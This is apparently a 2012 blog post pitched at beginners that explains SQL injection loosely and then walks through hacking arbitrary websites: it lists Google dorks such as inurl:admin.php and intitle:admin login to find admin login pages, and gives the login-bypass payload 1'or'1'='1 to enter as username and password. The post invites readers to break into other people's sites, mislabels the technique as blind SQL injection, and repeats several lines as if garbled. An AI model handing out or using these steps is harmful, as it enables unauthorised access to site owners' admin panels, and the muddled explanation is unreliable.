Friday, March 9, 2012
Basic sql injection tips to hack website | Post for noobs
Do you like this story?
what are sql injections?
Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say example and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.
In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).I will show you how to get into a website by using some google dorks and SQL query. By using SQL queries we can bypass the username and password and can enter into the admin panel. To hack a website simply follow these steps :-
steps to hack a site -
Use any of the google dork to find the admin login page of a website.
Use any of the google dork to find the admin login page of a website.
inurl:admin.asp
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp inurl:adminlogin.php
inurl:administrator
There are many websites which can be hacked by this. Open anyone and you will see the login
page. Type this SQL query in form.
page. Type this SQL query in form.
Username : 1'or'1'='1
Password : 1'or'1'='1
i hope you understand
Password : 1'or'1'='1
i hope you understand
